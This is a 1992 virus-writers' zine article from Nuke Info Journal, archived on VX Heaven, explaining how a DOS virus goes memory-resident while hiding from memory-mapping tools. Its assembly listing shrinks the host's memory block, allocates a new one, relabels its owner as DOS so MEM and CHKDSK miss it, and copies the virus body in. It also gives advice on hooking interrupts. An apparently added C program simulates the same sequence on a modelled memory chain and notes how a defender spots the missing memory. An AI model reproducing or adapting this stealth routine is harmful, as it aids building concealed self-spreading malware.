VX Heaven


Memory Stealth

Rock Steady
Nuke Info Journal [4]
August 1992


The advantages of having a memory-resident virus are unlimited. When our virus goes TSR it really doesn't do anything by itself: it just sits there, waiting to be called upon. Under DOS the 80x86 doesn't multitask, so don't think the virus runs "in the background". A TSR hooks interrupts, and which ones depends on what it must do. If it must be called often, hook Int 1Ch (the timer tick); if it must run when a file is executed, opened or closed, hook Int 21h. Then every time Int 21h is called, your virus runs first and afterwards passes control to the original Int 21h handler.

I will try to explain how to cut a block off our program's memory, allocate a block for the virus out of it, change that block's MCB so it no longer looks like ours, and move the virus into it so it stays resident.

para_size   equ     3               ;MCB layout: +0 type ('M'/'Z'), +1 owner PSP
mcb_owner   equ     1               ;segment (8 = DOS itself), +3 size in paragraphs
                                    ;virus_size, init_virus and exit_com are
                                    ;defined elsewhere in the virus body

        mov     cx,es               ;ES = our PSP segment
        dec     cx                  ;Subtract 1 to get the segment of its MCB
        mov     es,cx
        mov     bx,word ptr es:[para_size] ;BX = current block size in paragraphs
        mov     dx,virus_size       ;DX = virus size, unfortunately in bytes
        mov     cl,4
        shr     dx,cl               ;Bytes -> 16-byte paragraphs
        add     dx,4                ;Plus slack for rounding and the 3-byte offset
        sub     bx,dx               ;New block size = old size minus what we need
        mov     cx,es               ;Back to the PSP segment (a PUSH ES / POP ES
        inc     cx                  ;around the MCB access would have been cleaner)
        mov     es,cx
        mov     ah,4ah              ;DOS: resize memory block ES to BX paragraphs
        int     21h
        jc      exit_com            ;CF set = DOS refused the resize

; First part done. Now allocate a block for the virus out of the hole we
; just freed.
        mov     ah,48h              ;DOS: allocate memory
        dec     dx                  ;The new block's own MCB takes one paragraph,
        mov     bx,dx               ;so ask for DX-1 and consume the hole exactly
        int     21h
        jc      exit_com            ;CF set = no free block large enough

; AX = segment of the new block. Edit its MCB and move the virus in.
        dec     ax                  ;AX = segment of the new block's MCB
        mov     es,ax
        mov     cx,8h
        mov     word ptr es:[mcb_owner],cx ;Owner = 8: MEM lists it as DOS, not us
        sub     ax,0fh              ;MCB - 0Fh = block - 10h, so that with DI = 103h
        mov     es,ax               ;the virus lands 3 bytes into the block and keeps
        mov     di,103h             ;the offsets it was assembled with (org 100h + jmp)
        mov     si,bp               ;BP = delta offset
        add     si,offset init_virus ;SI = start of the virus inside the host
        mov     cx,virus_size       ;Bytes to move
        cld                         ;Ascending
        rep     movsb               ;Copy DS:SI -> ES:DI

That is all that is needed for the memory part of the trick; the interrupt hooks described above still have to be installed before the resident copy ever runs. The block does not show up as ours in memory-mapping utilities like MEM or CHKDSK, since its owner word says it belongs to DOS. However, DOS will report available memory to be short by the number of paragraphs we allocated. I will try to fix this darn thing that drives me crazy. I believe it can be solved like our FCB directory method, by adding the number of paragraphs our virus allocated back into what the memory-mapping utilities report. There IS a way, and we will find it. This topic will be continued in Info Journal #5.
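As an added illustration, not code from the article or from N-PoX, the C program below models the DOS MCB chain in a buffer and runs the same sequence on it: resize with function 4Ah, allocate with 48h, set the new MCB's owner word to 8, copy the body to (block - 10h):103h, then walk the chain the way MEM /C does. The memory map, the segment values FIRST_MCB and PSP_SEG, the 16 KiB size and the NOP-filled body are all constructed assumptions. It shows why allocating DX-1 paragraphs after shrinking by DX consumes the freed hole exactly, and why the block still costs what was allocated: the walker lists it as DOS-owned, yet the free-paragraph total drops.

```c
/* Added model of the DOS conventional-memory MCB chain, illustrating the
 * shrink / allocate / re-own sequence in the article.  Example code, not the
 * article's or N-PoX's: the memory map is constructed, and MEM_PARAS,
 * FIRST_MCB and PSP_SEG are assumed values, not taken from a real machine. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define MEM_PARAS  0x0400   /* model 16 KiB = 0x400 paragraphs (assumed)      */
#define FIRST_MCB  0x0010   /* assumed segment of the first MCB               */
#define PSP_SEG    0x0032   /* assumed PSP segment of the running .COM        */
#define OWNER_FREE 0
#define OWNER_DOS  8        /* owner 8 = the block belongs to DOS itself      */
/* MCB: +0 'M' (more follow) / 'Z' (last), +1 word owner PSP, +3 word size in
 * paragraphs; it sits one paragraph below its block (block = MCB + 1).       */
enum { MCB_TYPE = 0, MCB_OWNER = 1, MCB_SIZE = 3 };

static uint8_t mem[MEM_PARAS * 16];
static uint8_t *para(uint16_t seg) { return mem + (size_t)seg * 16; }
static uint16_t rd16(uint16_t s, int o) { uint8_t *p = para(s) + o; return (uint16_t)(p[0] | p[1] << 8); }
static void wr16(uint16_t s, int o, uint16_t v) { uint8_t *p = para(s) + o; p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void set_mcb(uint16_t m, char t, uint16_t owner, uint16_t size) {
    para(m)[MCB_TYPE] = (uint8_t)t; wr16(m, MCB_OWNER, owner); wr16(m, MCB_SIZE, size);
}
uint16_t mcb_owner(uint16_t block_seg) { return rd16(block_seg - 1, MCB_OWNER); }

/* Constructed map: a DOS-owned block, then the .COM owning everything up to
 * the top of memory, which is what DOS gives a .COM at load time.            */
void init_chain(void) {
    memset(mem, 0, sizeof mem);
    set_mcb(FIRST_MCB, 'M', OWNER_DOS, PSP_SEG - FIRST_MCB - 2);
    set_mcb(PSP_SEG - 1, 'Z', PSP_SEG, MEM_PARAS - PSP_SEG);
}
/* INT 21h/4Ah, shrink only: the tail becomes a free block with its own MCB.
 * Growing is refused here (the CF-set case the article tests with jc).       */
int dos_resize(uint16_t seg, uint16_t new_paras) {
    uint16_t mcb = seg - 1, old = rd16(mcb, MCB_SIZE), owner = rd16(mcb, MCB_OWNER);
    if (new_paras >= old) return new_paras == old ? 0 : -1;
    set_mcb(mcb + 1 + new_paras, (char)para(mcb)[MCB_TYPE], OWNER_FREE, old - new_paras - 1);
    set_mcb(mcb, 'M', owner, new_paras);
    return 0;
}
/* INT 21h/48h, first fit: returns the block segment, or -1 when nothing fits. */
int dos_alloc(uint16_t paras) {
    for (uint16_t mcb = FIRST_MCB;; mcb += rd16(mcb, MCB_SIZE) + 1) {
        uint16_t size = rd16(mcb, MCB_SIZE);
        char t = (char)para(mcb)[MCB_TYPE];
        if (rd16(mcb, MCB_OWNER) == OWNER_FREE && size >= paras) {
            if (size > paras) {   /* split the remainder off as a new free block */
                set_mcb(mcb + 1 + paras, t, OWNER_FREE, size - paras - 1);
                t = 'M';
            }
            set_mcb(mcb, t, PSP_SEG, paras);
            return mcb + 1;
        }
        if (t == 'Z') return -1;
    }
}
/* The article's sequence: shrink the program block by (virus_size/16)+4,
 * allocate one paragraph less (the hole minus its own MCB, so it is consumed
 * exactly), then mark the new block as owned by DOS (owner word = 8).        */
int go_resident(uint16_t virus_bytes) {
    uint16_t dx = (uint16_t)((virus_bytes >> 4) + 4), have = rd16(PSP_SEG - 1, MCB_SIZE);
    if (have <= dx || dos_resize(PSP_SEG, have - dx) != 0) return -1;
    int seg = dos_alloc(dx - 1);
    if (seg >= 0) wr16((uint16_t)seg - 1, MCB_OWNER, OWNER_DOS);
    return seg;
}
/* The copy: ES = block - 10h with DI = 103h puts the body 3 bytes into the
 * block, so code assembled at org 100h behind a 3-byte jmp keeps its offsets. */
int copy_body(uint16_t block_seg, const uint8_t *body, uint16_t len) {
    if ((uint32_t)len + 3 > (uint32_t)rd16(block_seg - 1, MCB_SIZE) * 16) return -1;
    memcpy(para(block_seg - 0x10) + 0x103, body, len);
    return 0;
}
/* Walk the chain as MEM /C does: count blocks with `owner`, sum their sizes. */
int walk_owner(uint16_t owner, uint16_t *paras) {
    int n = 0; uint16_t total = 0, mcb = FIRST_MCB;
    for (;; mcb += rd16(mcb, MCB_SIZE) + 1) {
        if (rd16(mcb, MCB_OWNER) == owner) { n++; total += rd16(mcb, MCB_SIZE); }
        if (para(mcb)[MCB_TYPE] == 'Z') break;
    }
    if (paras) *paras = total;
    return n;
}
uint16_t free_paras(void) { uint16_t f; walk_owner(OWNER_FREE, &f); return f; }
/* Chain sanity: only 'M'/'Z' types, and the 'Z' block ends at top of memory. */
int chain_ok(void) {
    for (uint16_t mcb = FIRST_MCB;;) {
        uint32_t next = (uint32_t)mcb + 1 + rd16(mcb, MCB_SIZE);
        if (para(mcb)[MCB_TYPE] == 'Z') return next == MEM_PARAS;
        if (para(mcb)[MCB_TYPE] != 'M' || next >= MEM_PARAS) return 0;
        mcb = (uint16_t)next;
    }
}
/* Whole scenario on a fresh map with a constructed body of NOPs (90h). */
int resident_demo(uint16_t virus_bytes) {
    static uint8_t body[4096];
    if (virus_bytes > sizeof body) return -1;
    memset(body, 0x90, virus_bytes);
    init_chain();
    int seg = go_resident(virus_bytes);
    return (seg < 0 || copy_body((uint16_t)seg, body, virus_bytes) != 0) ? -1 : seg;
}
```

On this map `resident_demo(1234)` returns block segment 3B0h, `mcb_owner` of it reads 8, the program's own block has shrunk from 3CEh to 37Dh paragraphs, and `free_paras()` is 0 afterwards: the walker shows two DOS-owned blocks and nothing free, which is exactly the shortfall the article complains about. A defender walking the chain cannot tell this block from a real DOS block by the owner word alone; comparing the free-memory figure against a known-good value is what exposes it.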

                                Rock Steady
              `Check out N-PoX(es) to see this Routine Working'